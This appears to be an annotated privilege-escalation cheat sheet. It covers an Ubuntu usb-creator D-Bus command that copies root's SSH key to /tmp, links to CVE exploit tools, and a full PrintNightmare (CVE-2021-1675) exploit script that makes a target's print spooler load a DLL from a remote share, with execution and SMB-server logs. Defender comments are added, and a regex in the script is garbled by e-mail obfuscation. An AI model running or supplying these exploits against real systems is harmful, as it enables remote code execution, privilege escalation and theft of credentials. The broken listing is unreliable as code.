Privilege Escalation

Linux

CVE-2015-3643: usb-creator before 0.2.38.3ubuntu0.1 on Ubuntu 12.04 LTS, before 0.2.56.3ubuntu0.1 on Ubuntu 14.04 LTS, before 0.2.62ubuntu0.3 on Ubuntu 14.10, and before 0.2.67ubuntu0.1 on Ubuntu 15.04 allows local users to gain privileges by leveraging a missing call to check_polkit for the KVMTest method.
# CVE-2015-3643: the usb-creator D-Bus service on the system bus accepted this
# call without a polkit authorization check (the CVE text above names the
# KVMTest method while the command below invokes Image; confirm against the
# Ubuntu advisory which methods were affected). Defender view: the fixed
# packages add the check; on hosts that log D-Bus/polkit activity, calls to
# com.ubuntu.USBCreator methods from an unprivileged session are the indicator.
gdbus call --system --dest com.ubuntu.USBCreator --object-path /com/ubuntu/USBCreator --method com.ubuntu.USBCreator.Image <target file> <destination>
# Worked example from the page: the privileged helper copies a root-only file
# to a world-readable path.
gdbus call --system --dest com.ubuntu.USBCreator --object-path /com/ubuntu/USBCreator --method com.ubuntu.USBCreator.Image /root/.ssh/id_rsa /tmp/pwn true
CVE-2021-3493: Ubuntu OverlayFS local privilege escalation. Affected releases:
    Ubuntu 20.10
    Ubuntu 20.04 LTS
    Ubuntu 18.04 LTS
    Ubuntu 16.04 LTS
    Ubuntu 14.04 ESM

Windows

Weblogic

CVE-2020-14882: Oracle WebLogic Remote Code Execution
Affected versions: 12.2.1.3.0, 12.2.1.4.0, 14.1.1.0.0
GitHub - GGyao/CVE-2020-14882_ALL: CVE-2020-14882_ALL综合利用工具,支持命令回显检测、批量命令回显、外置xml无回显命令执行等功能。

Active Directory

PrintNightmare (CVE-2021-1675): remote code execution in the Windows Print Spooler service

GitHub - ly4k/PrintNightmare: Python implementation for PrintNightmare (CVE-2021-1675 / CVE-2021-34527)
GitHub - calebstewart/CVE-2021-1675: Pure PowerShell implementation of CVE-2021-1675 Print Spooler Local Privilege Escalation (PrintNightmare)
https://github.com/afwu/PrintNightmare
GitHub - cube0x0/CVE-2021-1675: C# and Impacket implementation of PrintNightmare CVE-2021-1675/CVE-2021-34527
#!/usr/bin/python3
from impacket.dcerpc.v5 import rprn
from impacket.dcerpc.v5 import transport
from impacket.dcerpc.v5.dtypes import NULL
from impacket.structure import Structure
import argparse
import sys
import time
import pathlib
#https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/2825d22e-c5a5-47cd-a216-3e903fd6e030
class DRIVER_INFO_2_BLOB(Structure):
    """Parser for the DRIVER_INFO_2 blob returned by RpcEnumPrinterDrivers.

    The fixed part is five struct-style '<L' fields (little-endian unsigned
    32-bit offsets; see the MS-RPRN link above). The variable part holds
    UTF-16-LE strings, which fromString() slices out using those offsets.
    """
    structure = (
        ('cVersion','<L'),
        ('NameOffset', '<L'),
        ('EnvironmentOffset', '<L'),
        ('DriverPathOffset', '<L'),
        ('DataFileOffset', '<L'),
        ('ConfigFileOffset', '<L'),
    )

    def __init__(self, data = None):
        # Plain pass-through to impacket's Structure constructor.
        Structure.__init__(self, data = data)

    def fromString(self,data):
        """Unpack the fixed header, then decode each string from its offset.

        Each string is taken as the byte range between its own offset and the
        next field's offset, so the code assumes the strings are stored
        back-to-back in ascending-offset order ConfigFile, DataFile,
        DriverPath, Environment, Name. NOTE(review): the offsets come from the
        server response and are not bounds-checked or ordered-checked; a
        malformed response produces empty or garbled strings rather than an
        exception.
        """
        Structure.fromString(self, data)
        self['ConfigFileArray'] = self.rawData[self['ConfigFileOffset']:self['DataFileOffset']].decode('utf-16-le')
        self['DataFileArray'] = self.rawData[self['DataFileOffset']:self['DriverPathOffset']].decode('utf-16-le')
        self['DriverPathArray'] = self.rawData[self['DriverPathOffset']:self['EnvironmentOffset']].decode('utf-16-le')
        self['EnvironmentArray'] = self.rawData[self['EnvironmentOffset']:self['NameOffset']].decode('utf-16-le')
        # The last string runs to the end of the buffer, so any trailing data
        # after the name ends up inside NameArray.
        self['NameArray'] = self.rawData[self['NameOffset']:len(self.rawData)].decode('utf-16-le')
def connect(username, password, domain, lmhash, nthash, address, port):
    """Open a DCE/RPC session over the spoolss named pipe and bind MS-RPRN.

    Args:
        username, password, domain: account used for the SMB session.
        lmhash, nthash: NTLM hashes used instead of a password (empty strings
            when a password is supplied; see the __main__ block).
        address: target host; also embedded in the ncacn_np binding string.
        port: SMB port, passed through as the string argparse produced
            ('139' or '445').

    Returns:
        A connected DCE/RPC object bound to MSRPC_UUID_RPRN.

    Exits:
        Calls sys.exit(1) if get_dce_rpc/connect/bind raise. The bare
        `except:` also swallows KeyboardInterrupt and SystemExit and discards
        the error detail; `except Exception as e:` with the message printed
        would be the conventional form.

    Defender note: ordinary print clients open the same pipe and bind the
    same interface, so the connection and bind alone are weak evidence; the
    RpcAddPrinterDriverEx calls issued later in main() are the relevant
    artifact.
    """
    binding = r'ncacn_np:{0}[\PIPE\spoolss]'.format(address)
    rpctransport = transport.DCERPCTransportFactory(binding)

    rpctransport.set_dport(port)
    rpctransport.setRemoteHost(address)

    if hasattr(rpctransport, 'set_credentials'):
        # This method exists only for selected protocol sequences.
        rpctransport.set_credentials(username, password, domain, lmhash, nthash)

    print("[*] Connecting to {0}".format(binding))
    try:
        dce = rpctransport.get_dce_rpc()
        dce.connect()
        dce.bind(rprn.MSRPC_UUID_RPRN)
    except:
        # Reason for the failure is lost here (see docstring).
        print("[-] Connection Failed")
        sys.exit(1)
    print("[+] Bind OK")
    return dce
def getDrivers(dce, handle=NULL):
    """Enumerate installed printer drivers and parse the returned blob.

    Args:
        dce: bound RPRN session from connect().
        handle: value sent as pName; NULL (the default) presumably selects
            the spooler of the connected host — confirm against MS-RPRN.

    Returns:
        A DRIVER_INFO_2_BLOB parsed from the concatenated pDrivers bytes.
        NOTE(review): only one blob is parsed, so only the first entry's
        offsets are used; main() reads its DriverPathArray to find the
        directory of an existing driver.

    Raises:
        Whatever the RPC call or the blob parser raises; main() catches
        Exception around this call.
    """
    #get drivers
    resp = rprn.hRpcEnumPrinterDrivers(dce, pName=handle, pEnvironment="Windows x64\x00", Level=2)
    data = b''.join(resp['pDrivers'])

    #parse drivers
    blob = DRIVER_INFO_2_BLOB()
    blob.fromString(data)
    #blob.dump()

    return blob
def main(username, password, domain, lmhash, nthash, address, port, share):
    """Run one attempt of the driver-install sequence against the target.

    Args:
        username, password, domain, lmhash, nthash, address, port: forwarded
            unchanged to connect().
        share: UNC path of the DLL the spooler is asked to fetch; it is
            placed in pDataFile and its basename reused for later stages.

    Side effects:
        Prints progress. Terminates the process via sys.exit() when a stage
        returns ErrorCode 0 and via sys.exit(1) when driver enumeration
        fails. Returns normally only when every stage reported a non-zero
        ErrorCode, which is what lets the caller's retry loop run again.

    Defender notes (what this sequence looks like from the target side):
      * one RpcEnumPrinterDrivers, then up to 30 RpcAddPrinterDriverEx calls
        with dwFileCopyFlags = APD_COPY_ALL_FILES | 0x10 | 0x8000 (the two
        raw values appear to be APD_COPY_FROM_DIRECTORY and
        APD_INSTALL_WARNED_DRIVER in MS-RPRN — confirm against the spec);
      * a driver named "1234" whose pDataFile is a remote UNC path, so the
        spooler itself makes an outbound SMB connection to that share (the
        SMB-server transcript below shows the target connecting back);
      * pConfigFile pointing under spool\\drivers\\x64\\3\\old\\<n>\\ in the
        later stages.
    Driver-add events in the PrintService event logs and the spooler's
    outbound SMB connections and DLL loads are the detection surface; the
    vendor updates for CVE-2021-1675 / CVE-2021-34527 and the
    RestrictDriverInstallationToAdministrators policy value are the
    documented mitigations (see Microsoft's guidance for these CVEs).
    """
    #connect
    dce = connect(username, password, domain, lmhash, nthash, address, port)
    # The author left the UNC-name form commented out; NULL is what is sent.
    #handle = "\\\\{0}\x00".format(address)
    handle = NULL

    #find "C:\\Windows\\System32\\DriverStore\\FileRepository\\ntprint.inf_amd64_83aa9aebf5dffc96\\Amd64\\UNIDRV.DLL" path
    try:
        blob = getDrivers(dce, handle)
        # Reuse the directory of an already-installed driver so pDriverPath
        # refers to an existing UNIDRV.DLL on the target.
        pDriverPath = str(pathlib.PureWindowsPath(blob['DriverPathArray']).parent) + '\\UNIDRV.DLL'
    except Exception as e:
        print('[-] Failed to enumerate remote pDriverPath')
        print(str(e))
        sys.exit(1)

    print("[+] pDriverPath Found {0}".format(pDriverPath))

    #build DRIVER_CONTAINER package
    container_info = rprn.DRIVER_CONTAINER()
    container_info['Level'] = 2
    container_info['DriverInfo']['tag'] = 2
    container_info['DriverInfo']['Level2']['cVersion'] = 3
    container_info['DriverInfo']['Level2']['pName'] = "1234\x00"
    container_info['DriverInfo']['Level2']['pEnvironment'] = "Windows x64\x00"
    container_info['DriverInfo']['Level2']['pDriverPath'] = pDriverPath + '\x00'
    # pDataFile carries the caller-supplied UNC path: this field is what makes
    # the spooler reach out to a remote share.
    container_info['DriverInfo']['Level2']['pDataFile'] = "{0}\x00".format(share)
    container_info['DriverInfo']['Level2']['pConfigFile'] = "C:\\Windows\\System32\\kernelbase.dll\x00"

    # 0x10 and 0x8000 are unnamed here; see the docstring.
    flags = rprn.APD_COPY_ALL_FILES | 0x10 | 0x8000
    filename = share.split("\\")[-1]
    print("[*] Executing {0}".format(share))

    resp = rprn.hRpcAddPrinterDriverEx(dce, pName=handle, pDriverContainer=container_info, dwFileCopyFlags=flags)
    print("[*] Stage0: {0}".format(resp['ErrorCode']))
    for i in range(1, 30):
        try:
            # Stages 1..29 differ only in the numbered subdirectory used for
            # pConfigFile; which index (if any) succeeds depends on spooler
            # state on the target.
            container_info['DriverInfo']['Level2']['pConfigFile'] = "C:\\Windows\\System32\\spool\\drivers\\x64\\3\\old\\{0}\\{1}\x00".format(i, filename)
            resp = rprn.hRpcAddPrinterDriverEx(dce, pName=handle, pDriverContainer=container_info, dwFileCopyFlags=flags)
            print("[*] Stage{0}: {1}".format(i, resp['ErrorCode']))
            if (resp['ErrorCode'] == 0):
                print("[+] Exploit Completed")
                # SystemExit is not an Exception subclass, so the handler
                # below does not swallow it: success ends the whole script.
                sys.exit()
        except Exception as e:
            #print(e)
            # Any exception for this index is silently dropped and the next
            # index is tried; with the print commented out, the operator never
            # sees why a stage failed (e.g. a patched host rejecting the call).
            pass
if __name__ == '__main__':
    # Command-line front end: parse an impacket-style target string, collect
    # credentials, then run main() up to three times with a 10 s pause in
    # between (see the "#re-run" comment below).
    parser = argparse.ArgumentParser(add_help = True, description = "CVE-2021-1675 implementation.",formatter_class=argparse.RawDescriptionHelpFormatter,epilog="""
Example;
./CVE-2021-1675.py hackit.local/domain_user:[email protected] '\\\\192.168.1.215\\smb\\addCube.dll'
""")
    parser.add_argument('target', action='store', help='[[domain/]username[:password]@]<targetName or address>')
    parser.add_argument('share', action='store', help='Path to DLL. Example \'\\\\10.10.10.10\\share\\evil.dll\'')
    group = parser.add_argument_group('authentication')
    group.add_argument('-hashes', action="store", metavar = "LMHASH:NTHASH", help='NTLM hashes, format is LMHASH:NTHASH')
    group = parser.add_argument_group('connection')
    group.add_argument('-target-ip', action='store', metavar="ip address",
                       help='IP Address of the target machine. If omitted it will use whatever was specified as target. '
                            'This is useful when target is the NetBIOS name and you cannot resolve it')
    # No type=int: the port reaches connect() as a string.
    group.add_argument('-port', choices=['139', '445'], nargs='?', default='445', metavar="destination port",
                       help='Destination port to connect to SMB Server')

    if len(sys.argv)==1:
        parser.print_help()
        sys.exit(1)

    options = parser.parse_args()

    import re
    # NOTE(review): the literal "[email protected]" inside this pattern (and in
    # the epilog above) is an e-mail-obfuscation artifact of the web page the
    # listing was copied from, not part of the original script. The pattern
    # is still syntactically valid but will not split
    # domain/user:password@host the way the help text describes; compare
    # with the linked repository before relying on this copy.
    domain, username, password, address = re.compile('(?:(?:([^/@:]*)/)?([^@:]*)(?::([^@]*))[email protected])?(.*)').match(
        options.target).groups('')

    #In case the password contains '@'
    if '@' in address:
        password = password + '@' + address.rpartition('@')[0]
        address = address.rpartition('@')[2]

    if options.target_ip is None:
        options.target_ip = address

    if domain is None:
        # Effectively unreachable: groups('') already maps unmatched groups to ''.
        domain = ''

    if password == '' and username != '' and options.hashes is None:
        from getpass import getpass
        password = getpass("Password:")

    if options.hashes is not None:
        # No validation: a value without exactly one ':' raises ValueError here.
        lmhash, nthash = options.hashes.split(':')
    else:
        lmhash = ''
        nthash = ''

    #re-run if stage0/stageX fails
    # main() exits the process on success and on connect/enumeration failure,
    # so tries 2 and 3 only run when every stage returned a non-zero
    # ErrorCode.
    print("[*] Try 1...")
    main(username, password, domain, lmhash, nthash, options.target_ip, options.port, options.share)
    time.sleep(10)
    print("[*] Try 2...")
    main(username, password, domain, lmhash, nthash, options.target_ip, options.port, options.share)
    time.sleep(10)
    print("[*] Try 3...")
    main(username, password, domain, lmhash, nthash, options.target_ip, options.port, options.share)
(venv) C:\home\user\PrintNighmare\CVE-2021-1675> python CVE-2021-1675.py
usage: CVE-2021-1675.py [-h] [-hashes LMHASH:NTHASH] [-target-ip ip address] [-port [destination port]] target share

CVE-2021-1675 implementation.

positional arguments:
target [[domain/]username[:password]@]<targetName or address>
share Path to DLL. Example '\\10.10.10.10\share\evil.dll'

optional arguments:
-h, --help show this help message and exit

authentication:
-hashes LMHASH:NTHASH
NTLM hashes, format is LMHASH:NTHASH

connection:
-target-ip ip address
IP Address of the target machine. If omitted it will use whatever was specified as target. This is useful when target is the NetBIOS name and you cannot resolve it
-port [destination port]
Destination port to connect to SMB Server

Example;
./CVE-2021-1675.py hackit.local/domain_user:[email protected] '\\192.168.1.215\smb\addCube.dll'

(venv) C:\home\user\PrintNighmare\CVE-2021-1675>

----------------EXECUTION----------------------------------------

(venv) C:\home\user\PrintNighmare\CVE-2021-1675> python CVE-2021-1675.py acme.corp/[email protected] '\\10.0.200.8\dlls\addme.dll'
Password:
[*] Try 1...
[*] Connecting to ncacn_np:10.0.200.6[\PIPE\spoolss]
[+] Bind OK
[+] pDriverPath Found C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_18b0d38ddfaee729\Amd64\UNIDRV.DLL
[*] Executing \\10.0.200.8\dlls\addme.dll

-----------------SMB SERVER---------------------------------------

(venv) C:\home\user\PrintNighmare\DLLs> impacket-smbserver -smb2support dlls .
Impacket v0.9.24.dev1+20210630.100536.73b9466c - Copyright 2021 SecureAuth Corporation

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
[*] Incoming connection (10.0.200.6,50157)
[*] AUTHENTICATE_MESSAGE (\,WIN-9N94NF2FA11)
[*] User WIN-9N94NF2FA11\ authenticated successfully
[*] :::00::aaaaaaaaaaaaaaaa
[*] Closing down connection (10.0.200.6,50157)
[*] Remaining connections []
[*] Incoming connection (10.0.200.6,50158)
[*] AUTHENTICATE_MESSAGE (\,WIN-9N94NF2FA11)
[*] User WIN-9N94NF2FA11\ authenticated successfully
[*] :::00::aaaaaaaaaaaaaaaa
[*] Closing down connection (10.0.200.6,50158)
[*] Remaining connections []
[*] Incoming connection (10.0.200.6,50159)
[*] AUTHENTICATE_MESSAGE (\,WIN-9N94NF2FA11)
[*] User WIN-9N94NF2FA11\ authenticated successfully
[*] :::00::aaaaaaaaaaaaaaaa
[*] Closing down connection (10.0.200.6,50159)
[*] Remaining connections []